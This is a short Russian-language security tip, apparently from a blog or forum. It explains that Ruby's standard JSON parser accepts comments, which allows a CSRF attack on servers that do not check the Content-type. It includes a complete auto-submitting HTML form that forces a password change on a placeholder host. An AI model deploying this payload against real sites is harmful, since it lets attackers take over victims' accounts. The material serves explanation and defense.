Ruby забавно парсит JSON стандартным модулем. В него можно писать комментарии!Например, если серверная часть не проверяет Content-type запроса на application/json, можно сформировать сценарий для CSRF.<body onload="document.forms[0].submit();"><form action="https://visim" method="POST" enctype="text/plain"><input type="hidden" name='{"action":"changepassword","password":"PwnMePls!1!!"}//' value=""></form></body>